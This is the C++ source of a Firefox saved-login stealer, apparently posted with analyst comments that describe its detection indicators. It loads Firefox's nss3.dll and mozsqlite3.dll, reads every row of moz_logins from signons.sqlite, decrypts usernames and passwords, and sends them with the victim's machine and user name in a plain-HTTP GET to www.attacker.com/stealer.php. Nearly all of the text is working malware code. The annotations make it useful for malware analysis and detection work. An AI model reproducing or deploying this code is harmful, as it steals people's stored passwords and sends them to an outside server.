[cpp]#include <Windows.h>
#include <WinInet.h>
// Hard-coded collection endpoint used by Request() and main(): host name,
// TCP port and server-side page. PORT 80 with no secure flag anywhere in this
// file means the upload is plain HTTP. The host name looks like a placeholder
// in this listing; in a real sample these three values are the network
// indicators to extract.
#define HOST "www.attacker.com"
#define PORT 80
#define PAGE_NAME "stealer.php"
// Builds a path to a directory under %APPDATA%\Mozilla\Firefox\Profiles\ and
// returns it in a malloc'd 1024-byte buffer that the caller owns.
//
// Analyst notes:
//  - The file-system artefact is a directory enumeration of the current
//    user's Firefox "Profiles" folder by a process that is not Firefox.
//  - The profile is not read from profiles.ini (that variant is commented
//    out below). The code takes whatever entry `information` holds after one
//    FindFirstFileExA and three FindNextFile calls, so the chosen profile
//    depends on enumeration order.
//  - No API result is checked and every string operation is unbounded, so the
//    returned path may be garbage if the Profiles folder is missing or holds
//    fewer entries than expected.
char * getProfilePath()
{
// Declared but never used in this function.
DWORD dwBytesRead = 0;
char ReadBuffer[513] = {0};
// %APPDATA% is expanded into a 256-byte heap buffer; the length returned in
// strSize is never inspected.
char* appDataStr = (char*)malloc(256*sizeof(char));
int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 );
char* iniFile;
// Allocation is sized with sizeof(char*), but only the first 512 bytes are zeroed.
iniFile = (char*)malloc(512*sizeof(char*));
ZeroMemory(iniFile,512);
//strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini");
// Wildcard search pattern for the per-user profile directories.
strcat((char*)appDataStr,"\\Mozilla\\Firefox\\Profiles\\*");
strcat((char*)iniFile,(char*)appDataStr);
HANDLE handle;
WIN32_FIND_DATA information;
// Directory search; the find handle is never closed in this function.
handle = FindFirstFileExA(iniFile,FindExInfoStandard,&information,FindExSearchLimitToDirectories,NULL,0);
if( handle != INVALID_HANDLE_VALUE)
{
// Advance three entries past the first result; return values are ignored.
for(int i = 0; i <3; i=i+1)
{
FindNextFile(handle,&information);
}
}
char *realPath;
realPath = (char*)malloc(1024*sizeof(char));
ZeroMemory(realPath,1024*sizeof(char));
// Copy the search pattern without its last character (the '*'), then append
// the name of the directory entry that was found.
strncat(realPath,iniFile,strlen(iniFile)-1);
strcat(realPath,(char*)information.cFileName);
return realPath;
}
// Sends one HTTP GET to `server` on PORT through WinINet, with `input` as the
// request path and query string. The response is never read.
//
// Network indicators visible in this function:
//  - The agent string passed to InternetOpenA is the literal "Open".
//  - INTERNET_OPEN_TYPE_PRECONFIG is used, so the request follows the
//    system's configured proxy settings and should appear in proxy logs.
//  - Plain HTTP: no INTERNET_FLAG_SECURE is set, and main() places the
//    collected data in the URL query string, where it is readable in web
//    proxy logs and on the wire.
//  - A GET request carries a form-urlencoded Content-Type header, which is
//    unusual for a request with no body.
void Request (const char* server,const char* input)
{
HINTERNET hInternet;
HINTERNET hConnect;
HINTERNET hRequest;
// Cache lookups are disabled for this session.
hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE);
if (hInternet != NULL)
{
hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u);
if (hConnect != NULL)
{
// `input` becomes the object name (path plus query string) of the GET.
hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1);
if (hRequest != NULL)
{
// The result of the send is not checked.
HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0);
}
}
}
// All three handles are closed unconditionally, including any that were
// never assigned because an earlier call failed.
InternetCloseHandle(hInternet);
InternetCloseHandle(hConnect);
InternetCloseHandle(hRequest);
}
// Returns a malloc'd 1024-byte string holding the machine name immediately
// followed by the logged-on user name, with no separator. main() uses it as
// the victim identifier in the upload URL, so the `computerName=` query
// value in captured traffic has the form <COMPUTERNAME><username>.
// Neither API result is checked, and the two intermediate buffers are not freed.
char* getComputerName()
{
DWORD computerNameSize = 512;
char* computerName;
computerName = (char*)malloc(512*sizeof(char));
GetComputerNameA(computerName, &computerNameSize);
DWORD UserNameSize = 512;
char* userName;
userName = (char*)malloc(512*sizeof(char));
GetUserNameA(userName, &UserNameSize);
char* fullComputerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(fullComputerName,1024*sizeof(char));
strcat(fullComputerName,(const char*)computerName);
strcat(fullComputerName,userName);
return fullComputerName;
}
// Opaque SQLite handle types and function-pointer types for the SQLite
// entry points that main() resolves at run time from mozsqlite3.dll with
// GetProcAddress. The program does not link against SQLite, so these names
// do not appear in its import table; they appear only as strings passed to
// GetProcAddress.
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
typedef int (_cdecl *sqlite3_open)(
const char *filename, /* Database filename (UTF-8) */
sqlite3 **ppDb /* OUT: SQLite db handle */
);
typedef int (_cdecl *sqlite3_prepare_v2)(
sqlite3 *db, /* Database handle */
const char *zSql, /* SQL statement, UTF-8 encoded */
int nByte, /* Maximum length of zSql in bytes. */
sqlite3_stmt **ppStmt, /* OUT: Statement handle */
const char **pzTail /* OUT: Pointer to unused portion of zSql */
);
typedef int (_cdecl *sqlite3_close)(sqlite3 *);
typedef int (_cdecl *sqlite3_step)(sqlite3_stmt *);
typedef const unsigned char * (_cdecl *sqlite3_column_text)(sqlite3_stmt *, int iCol);
// Local re-declarations of the NSS types and function signatures this
// program needs, so it can call into Firefox's own nss3.dll without the NSS
// headers. main() binds the function-pointer types below to exports of
// nss3.dll through GetProcAddress.
typedef enum _SECItemType{
siBuffer = 0,
siClearDataBuffer = 1,
siCipherDataBuffer = 2,
siDERCertBuffer = 3,
siEncodedCertBuffer = 4,
siDERNameBuffer = 5,
siEncodedNameBuffer = 6,
siAsciiNameString = 7,
siAsciiString = 8,
siDEROID = 9,
siUnsignedInteger = 10,
siUTCTime = 11,
siGeneralizedTime = 12
} SECItemType;
// Length-prefixed byte buffer used for the input and output of the decode
// and decrypt calls.
typedef struct _SECItem
{
SECItemType type;
unsigned char *data;
unsigned int len;
} SECItem;
// NSS status codes; SECSuccess is 0, which is why main() tests results with `!`.
typedef enum _SECStatus
{
SECWouldBlock = -2,
SECFailure = -1,
SECSuccess = 0
} SECStatus;
typedef struct PRArenaPool PRArenaPool;
// The key-slot handle is treated as an opaque DWORD* throughout this file.
typedef SECStatus (CDECL *NSS_Init)(const char *configdir);
typedef DWORD * (CDECL *PK11_GetInternalKeySlot) (void);
typedef SECStatus (CDECL *PK11_Authenticate)(DWORD *slot, int loadCerts, void *wincx);
typedef SECStatus (CDECL *PK11SDR_Decrypt)(SECItem *data, SECItem *result, void *cx);
typedef void (CDECL *PK11_FreeSlot)(DWORD *slot);
typedef SECStatus (CDECL *NSS_Shutdown)(void);
typedef SECItem * (CDECL *NSSBase64_DecodeBuffer)(PRArenaPool *arenaOpt, SECItem *outItemOpt, const char *inStr, unsigned int inLen);
// Entry point of a Firefox saved-login stealer. Annotated for analysis and
// detection; the code itself is unchanged.
//
// Observable behaviour, in order:
//  1. Points the DLL search path at "%PROGRAMFILES%\Mozilla Firefox\" and
//     loads mozsqlite3.dll and nss3.dll from it. A process other than
//     Firefox loading these two modules is a strong host-side signal.
//  2. Opens <profile>\signons.sqlite and reads every row of moz_logins.
//     signons.sqlite is the login store of older Firefox releases; later
//     releases keep logins in logins.json, which this code never touches.
//  3. For each row, initialises NSS against the profile directory and asks
//     NSS to decrypt columns 6 and 7, which the code labels username and
//     password. No password is passed to PK11_Authenticate (wincx is NULL);
//     presumably this fails when the profile has a primary password set -
//     verify against NSS behaviour.
//  4. Sends the result to HOST as the query string of a plain-HTTP GET:
//       PAGE_NAME?computerName=<machine><user>-signons&signons=<records>
//     with each record formatted as "username:<u>-password:<p>*-*-*".
//
// No API result other than the sqlite3_open return code is checked, and all
// string building is unbounded strcat/strcpy into fixed-size heap buffers, so
// the sample may crash or send truncated or garbage data on hosts that do
// not match its assumptions.
int main()
{
NSS_Init _NSS_Init;
PK11_GetInternalKeySlot _PK11_GetInternalKeySlot;
PK11_Authenticate _PK11_Authenticate;
NSSBase64_DecodeBuffer _NSSBase64_DecodeBuffer;
PK11SDR_Decrypt _PK11SDR_Decrypt;
PK11_FreeSlot _PK11_FreeSlot;
NSS_Shutdown _NSS_Shutdown;
sqlite3_open _sqlite3_open;
sqlite3_close _sqlite3_close;
sqlite3_prepare_v2 _sqlite3_prepare_v2;
sqlite3_step _sqlite3_step;
sqlite3_column_text _sqlite3_column_text;
HMODULE mozsqlite3,nss3;
// Build the Firefox install directory and make it the DLL search directory
// so the two libraries and their dependencies resolve from there.
char* path = (char*)malloc(2048*sizeof(char));
ZeroMemory(path,2048*sizeof(char));
int strSize = ExpandEnvironmentStringsA("%PROGRAMFILES%",path, 256);
strcat(path,"\\Mozilla Firefox\\");
SetDllDirectoryA(path);
mozsqlite3 = LoadLibraryA("mozsqlite3.dll");
nss3 = LoadLibraryA("nss3.dll");
// Run-time resolution of every NSS and SQLite entry point. The export names
// below are present as plain strings in the binary and are useful for
// static signatures. Neither the module handles nor the resolved pointers
// are checked for NULL.
_NSS_Init = (NSS_Init)GetProcAddress(nss3, "NSS_Init");
_PK11_GetInternalKeySlot = (PK11_GetInternalKeySlot)GetProcAddress(nss3, "PK11_GetInternalKeySlot");
_PK11_Authenticate = (PK11_Authenticate)GetProcAddress(nss3, "PK11_Authenticate");
_NSSBase64_DecodeBuffer = (NSSBase64_DecodeBuffer)GetProcAddress(nss3, "NSSBase64_DecodeBuffer");
_PK11SDR_Decrypt = (PK11SDR_Decrypt)GetProcAddress(nss3, "PK11SDR_Decrypt");
_PK11_FreeSlot = (PK11_FreeSlot)GetProcAddress(nss3, "PK11_FreeSlot");
_NSS_Shutdown = (NSS_Shutdown)GetProcAddress(nss3, "NSS_Shutdown");
_sqlite3_open = (sqlite3_open)GetProcAddress(mozsqlite3, "sqlite3_open");
_sqlite3_close = (sqlite3_close)GetProcAddress(mozsqlite3, "sqlite3_close");
_sqlite3_prepare_v2 = (sqlite3_prepare_v2)GetProcAddress(mozsqlite3, "sqlite3_prepare_v2");
_sqlite3_step = (sqlite3_step)GetProcAddress(mozsqlite3, "sqlite3_step");
_sqlite3_column_text = (sqlite3_column_text)GetProcAddress (mozsqlite3, "sqlite3_column_text");
// The profile directory is looked up twice: once as the NSS config
// directory and once as the base of the signons.sqlite path.
char* profile;
profile = (char*)malloc(1024*sizeof(char));
ZeroMemory(profile,1024*sizeof(char));
strcpy(profile,(char*)getProfilePath());
char* profile4signons;
profile4signons = (char*)malloc(1024*sizeof(char));
ZeroMemory(profile4signons,1024*sizeof(char));
strcpy(profile4signons,(char*)getProfilePath());
sqlite3 *db; // sqlite3 db struct
sqlite3_stmt *res;
const char *tail;
// File-access indicator: <profile>\signons.sqlite opened by a non-browser process.
strcat(profile4signons,"\\signons.sqlite");
// Fixed 4096-byte accumulator for every decrypted record; nothing bounds
// how much is appended to it.
char* signons;
signons = (char*)malloc(4096*sizeof(char));
ZeroMemory(signons,4096*sizeof(char));
int error = _sqlite3_open(profile4signons, &db);
if(!error)
{
_sqlite3_prepare_v2(db,"select * from moz_logins",strlen("select * from moz_logins"),&res,&tail);
// 100 is SQLITE_ROW: iterate while the statement yields another row.
while(_sqlite3_step(res) == 100)
{
strcat(signons,"username:");
DWORD* keyslot;
// NSS is initialised and shut down once per field per row, so this sequence
// repeats 2 * (number of rows) times.
if (! _NSS_Init(profile))
{
keyslot = _PK11_GetInternalKeySlot();
if(keyslot)
{
SECItem cryptedSECItem, DecryptedSECItem;
if(!_PK11_Authenticate (keyslot, 1, NULL))
{
cryptedSECItem.data = NULL;
cryptedSECItem.len = NULL;
DecryptedSECItem.data = NULL;
DecryptedSECItem.len = NULL;
// Column 6 is Base64-decoded and then decrypted by NSS. Neither result is
// acted on; the output is appended as a C string without using .len.
bool res2 = _NSSBase64_DecodeBuffer(NULL, &cryptedSECItem, (char*)_sqlite3_column_text(res, 6),strlen((char*)_sqlite3_column_text(res, 6)));
bool res1 = _PK11SDR_Decrypt(&cryptedSECItem, &DecryptedSECItem, NULL);
strcat(signons,(char*)DecryptedSECItem.data);
res2 = false;
res1 = false;
}
}
_PK11_FreeSlot(keyslot);
}
_NSS_Shutdown();
strcat(signons,"-");
strcat(signons,"password:");
DWORD* keyslotPass;
// Same sequence as above, applied to column 7.
if (! _NSS_Init(profile))
{
keyslotPass = _PK11_GetInternalKeySlot();
if(keyslotPass)
{
SECItem cryptedSECItemPass, DecryptedSECItemPass;
if(!_PK11_Authenticate (keyslotPass, 1, NULL))
{
cryptedSECItemPass.data = NULL;
cryptedSECItemPass.len = NULL;
DecryptedSECItemPass.data = NULL;
DecryptedSECItemPass.len = NULL;
bool res2 = _NSSBase64_DecodeBuffer(NULL, &cryptedSECItemPass, (char*)_sqlite3_column_text(res, 7),strlen((char*)_sqlite3_column_text(res, 7)));
bool res1 = _PK11SDR_Decrypt(&cryptedSECItemPass, &DecryptedSECItemPass, NULL);
strcat(signons,(char*)DecryptedSECItemPass.data);
res2 = false;
res1 = false;
}
}
_PK11_FreeSlot(keyslotPass);
}
_NSS_Shutdown();
// Record terminator; together with "username:" and "password:" it gives a
// recognisable pattern in the outbound URL.
strcat(signons,"*-*-*");
}
}
// Victim identifier: machine name followed by user name.
char* computerName;
computerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(computerName,1024*sizeof(char));
computerName = getComputerName();
// A single 429496729-byte (about 410 MB) buffer is allocated and zeroed for
// the URL. The allocation result is not checked. The resulting jump in
// committed memory is a noticeable run-time artefact.
char *data;
data = (char*)malloc(429496729*sizeof(char));
ZeroMemory(data,429496729*sizeof(char));
// URL layout: PAGE_NAME?computerName=<id>-signons&signons=<records>.
// The values are concatenated as-is, with no URL encoding.
strcpy(data,PAGE_NAME);
strcat(data,"?computerName=");
strcat(data,computerName);
strcat(data,"-signons");
strcat(data,"&signons=");
strcat(data,signons);
// Exfiltration: one plain-HTTP GET to HOST carrying the credentials in the
// query string.
Request(HOST,data);
// db is closed even when sqlite3_open reported an error above.
_sqlite3_close(db);
FreeLibrary(nss3);
FreeLibrary(mozsqlite3);
free(data);
return 0;
}[/cpp]